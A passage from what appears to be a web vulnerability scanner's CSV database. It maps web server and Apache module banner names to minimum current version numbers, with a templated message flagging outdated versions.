@CURRENT_VER)\"\n\"600206\",\"fp/\",\"4.0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600207\",\"FPWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600208\",\"FreezeServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600209\",\"Frontier/\",\"9.1b2-MacOSX\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600210\",\"FrontPage-PWS32/\",\"4.0.2.2717\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600211\",\"FrontPage/\",\"5.0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER) (may depend on server version)\"\n\"600212\",\"FSID/\",\"M25-8514\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600213\",\"FSPMS/\",\"5.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600214\",\"FT::Srv/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600215\",\"FTU/\",\"2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600216\",\"Fujitsu-InfoProvider-Pro/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600217\",\"Fujitsu-InfoProvider-Pro/V\",\"3.0L20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600218\",\"Ganesh/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600219\",\"gettxt/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600220\",\"GFE/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600221\",\"GG/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600222\",\"giFT-Gnutella/\",\"0.0.10.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600223\",\"glass/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600224\",\"GMSE_Sandcastle/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600225\",\"Gnat-Box/\",\"3.3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600226\",\"GNNserver/\",\"2.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600227\",\"GoAhead-Webs/\",\"2.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600228\",\"GoAhead/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600229\",\"GoGoGadgetWebserver/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600230\",\"GordianEmbedded/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600231\",\"GoServe/\",\"2.52\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600232\",\"Ground/\",\"5.3.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600233\",\"GTS-Datanet/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600234\",\"GTS/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600235\",\"gtxs/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600236\",\"GUILD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600237\",\"GWS/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600238\",\"HackersLabWebServer/\",\"7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600239\",\"Hardened-PHP/\",\"5.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600240\",\"HavelsanEmbeddedQuix/\",\"18.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600241\",\"Hawkeye/\",\"1.3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600242\",\"heitml/\",\"2.05\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600243\",\"Hitmatic/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600244\",\"HomeGrownServer/\",\"10.3.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600245\",\"Homepage-Engine/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600246\",\"HP Apache-based Web Server/\",\"1.3.27 (Unix)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600247\",\"HP Web Jetadmin/\",\"2.0.50\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600248\",\"HP-ChaiServer/\",\"HP-ChaiServer/3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600249\",\"HP-ChaiSOE/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600250\",\"HP-UX_Apache-based_Web_Server/\",\"2.0.48\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600251\",\"Hp-Web-JetAdmin-\",\"5.06.190\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600252\",\"Hp-Web-Server-\",\"3.00.1696\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600253\",\"HPWB/\",\"4.3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600254\",\"HSP/\",\"2.10.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600255\",\"HTS/\",\"2.99\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600256\",\"HTTP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600257\",\"HTTPd-WASD/\",\"11.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600258\",\"httpd/\",\"2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600259\",\"HTTPlistener/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600260\",\"HTTPS/\",\"0.991\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600261\",\"HttpStk/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600262\",\"Hunn/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600263\",\"HyNetOS/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600264\",\"Hyperwave-Information-Server/\",\"5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600265\",\"Hyperwave-IS/\",\"6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600266\",\"IBM HTTP Server/\",\"V5R3M0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600267\",\"IBM_HTTP_Server/\",\"7.0.0.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600268\",\"IBM-HTTP-Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600269\",\"IBM-ICS/\",\"4.2.1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600270\",\"IBM-PROXY-WTE-US/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600271\",\"IBM-PROXY-WTE/\",\"6f.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600272\",\"IBMHTTPServer/\",\"V5R3M0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600273\",\"icecast/\",\"icecast/1.3.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600274\",\"IceWarp/\",\"13.0.3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600275\",\"IceWarpWebSrv/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600276\",\"ID/\",\"878810\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600277\",\"IdeaWebServer/\",\"v0.80\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600278\",\"IDS-Server/\",\"4.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600279\",\"IgServ/\",\"1.0.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600280\",\"iHTML/\",\"2.20.324\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600281\",\"IIS/\",\"10.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600282\",\"Inc.onz/\",\"VMV4R4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600283\",\"include/\",\"3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600284\",\"Indy/\",\"10.0.52\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600285\",\"inets/\",\"5.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600286\",\"Infrastructure/\",\"4.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600287\",\"Inktomi Search\",\"4.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600288\",\"Intel NetportExpressPro/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600289\",\"Interaction/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600290\",\"Interambition HTTPd/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600291\",\"InterambitionHTTPd/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600292\",\"InterJet/\",\"3.2.1p16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600293\",\"InterSpace HTTP Tunneling/\",\"1.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600294\",\"InterSpaceFDS/\",\"2.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600295\",\"InterSpaceHTTPTunneling/\",\"1.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600296\",\"Intrusion/\",\"1.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600297\",\"IPCheck/\",\"5.4.0.796\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600298\",\"IPL/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600299\",\"iPlanet-Enterprise/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600300\",\"iPlanet-Web-Proxy-Server/\",\"3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600301\",\"iPlanetEnterprise/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600302\",\"ipMonitor \",\"9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600303\",\"iPrism-httpd/\",\"v3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600304\",\"Ipswitch-IMail/\",\"8.22\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600305\",\"IpswitchWebCalendaring/\",\"8.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600306\",\"iPyramid.system/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600307\",\"ISS-PXServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600308\",\"iTPSecureWebServer/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600309\",\"iTunes/\",\"4.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600310\",\"IXOS-eCON/\",\"5.0A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600311\",\"J2EE SDK/\",\"1.3.1 (HTTP/1.1 Connector)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600312\",\"J2EESDK/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600313\",\"JAGeX/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600314\",\"JaguarServerVersion/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600315\",\"Jana-Server/\",\"2.4.6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600316\",\"JanaServer/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600317\",\"JARING/\",\"10.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600318\",\"java/\",\"1.8.0_144\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600319\",\"JavaHttpServer/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600320\",\"JavaWebServer/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600321\",\"JBoss_\",\"4_0_3_SP1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600322\",\"JC-HTTPD/\",\"1.16.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600323\",\"JETServ/\",\"2.2.25\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600325\",\"JeusWebContainer/\",\"Jeus WebContainer/4.2.4.7\",\"RUNNING_VER appears to be outdated (current is at least CURRENT_VER)\"\n\"600326\",\"Jigsaw/\",\"2.2.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600327\",\"Joke/\",\"0.9b5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600328\",\"JRun/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600329\",\"JRunWebServer/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600330\",\"JSP/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600331\",\"JWalkServer/\",\"Version3.3C8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600332\",\"JXAS/\",\"3.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600333\",\"keyLargo HTTPD \",\"v1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600334\",\"KK-NET wpp/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600335\",\"KnowNowLiveServer/\",\"2.0.7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600336\",\"Koalah/\",\"1.3.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600337\",\"L series Web/\",\"1.0-beta\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600338\",\"L/\",\"FSV-28-01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600339\",\"LabVIEW/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600340\",\"LANWeb.I/\",\"v1.82\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600341\",\"Lasso/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600342\",\"Legend-IIS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600343\",\"LePenguin \",\"0.2a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600344\",\"Liberator/\",\"3.4.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600345\",\"libwww-perl-daemon/\",\"6.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600346\",\"lighttpd/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600348\",\"Line-Tap/\",\"3.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600349\",\"Linux-Mandrake/\",\"3mdk\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600350\",\"Linux/\",\"11mdk\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600351\",\"LiteSpeed/\",\"6.0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600352\",\"LittleDutchMoose/\",\"v10.3Build\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600353\",\"LocalDirector/\",\"4.2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600354\",\"Lotus-Domino/\",\"6.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600355\",\"Lotus-Domino/Release-\",\"4.6.7a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600356\",\"LURHQServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600357\",\"LV_HTTP/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600358\",\"M-HTTPD/\",\"2.0.11.3 (Unix) PHP/3.0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600359\",\"MacHTTP/\",\"2.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600360\",\"madna/\",\"1.42\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600361\",\"MAIA/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600362\",\"MailSite-HTTPMA/\",\"8.0.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600363\",\"MakeShop/\",\"1.0.29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600364\",\"Mandrake Linux/\",\"10.2mdk\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600365\",\"Mark/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600366\",\"Mathopd/\",\"1.6b7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600367\",\"Matsya/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600368\",\"Mediasurface/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600369\",\"Meridian Data/\",\"2.1.340\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600370\",\"Meta-HTML/\",\"6.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600371\",\"MGI Server/\",\"1.7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600372\",\"MHttpd/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600373\",\"Micro-HTTP/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600374\",\"Microsoft_PWS_Mac/\",\"4.0b1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600375\",\"Microsoft-HTTPAPI/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600376\",\"Microsoft-IIS/\",\"10.0\",\"@RUNNING_VER may be outdated (current is at least @CURRENT_VER; IIS 6.0 support is available until 2014)\"\n\"600377\",\"Microsoft-Internet-Information-Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600378\",\"Microsoft-PWS-95/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600379\",\"Microsoft-PWS/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600380\",\"Microsoft-WinCE/\",\"6.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600381\",\"Midgard/\",\"8.09.6.99\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600382\",\"mini_httpd/\",\"1.1919\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600383\",\"Mini-Proxy/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600384\",\"Mini-Web/\",\"0.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600385\",\"MiniServ/\",\"1.590\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600386\",\"MiniWebSvr/\",\"0.0.9svn\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600387\",\"Minstrel-httpd/\",\"2.0.g\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600388\",\"Miranda Web/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600389\",\"MirandaWeb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600390\",\"Mirapoint/\",\"3.5.4-GR\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600391\",\"Miwok/\",\"1.618\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600392\",\"mod_accel/\",\"1.0.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600393\",\"mod_accessref/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600394\",\"mod_accounting/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600395\",\"mod_adu/\",\"cu_1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600396\",\"mod_advert/\",\"1.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600397\",\"mod_antihak/\",\"0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600399\",\"mod_attach/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600400\",\"mod_auth_ascauth/\",\"1.1-Basic\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600401\",\"mod_auth_birdview/\",\"1.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600402\",\"mod_auth_cutoken/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600403\",\"mod_auth_external/\",\"2.2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600404\",\"mod_auth_ianus/\",\"3.4-PAT\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600405\",\"mod_auth_inst.c/\",\"19980202\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600406\",\"mod_auth_ip/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600407\",\"mod_auth_kerb/\",\"5.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600408\",\"mod_auth_ldap/\",\"2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600409\",\"mod_auth_mda/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600410\",\"mod_auth_mysql/\",\"2.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600411\",\"mod_auth_nds/\",\"0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600412\",\"mod_auth_notes/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600413\",\"mod_auth_ns/\",\"0.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600414\",\"mod_auth_nt/\",\"1.3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600415\",\"mod_auth_ntdom/\",\"0.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600416\",\"mod_auth_ora7/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600417\",\"mod_auth_ora8/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600418\",\"mod_auth_oracle/\",\"0.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600419\",\"mod_auth_pam_external/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600420\",\"mod_auth_pam/\",\"1.1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600421\",\"mod_auth_passthrough/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600422\",\"mod_auth_pgsql_sys/\",\"0.9.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600423\",\"mod_auth_pgsql/\",\"2.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600424\",\"mod_auth_pop3/\",\"0.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600425\",\"mod_auth_radius/\",\"1.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600426\",\"mod_auth_remote/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600427\",\"mod_auth_shadow/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600428\",\"mod_auth_sspi/\",\"1.0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600429\",\"mod_auth_tkt/\",\"2.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600430\",\"mod_authserv_userdir/\",\"asam1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600431\",\"mod_backhand/\",\"1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600432\",\"mod_bandwidth/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600433\",\"mod_become/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600434\",\"mod_bigwig/\",\"2.0-15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600435\",\"mod_binford/\",\"6100\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600436\",\"mod_blosxom/\",\"0.05\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600437\",\"mod_bluestem/\",\"0.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600438\",\"mod_bwlimited/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600439\",\"mod_bwprotect/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600440\",\"mod_bwshare/\",\"0.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600441\",\"mod_cap/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600442\",\"mod_catax/\",\"4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600443\",\"mod_cgi_sugid/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600444\",\"mod_choke/\",\"0.07\",\"@RUNNING_VER appears to be outdated (current is at least 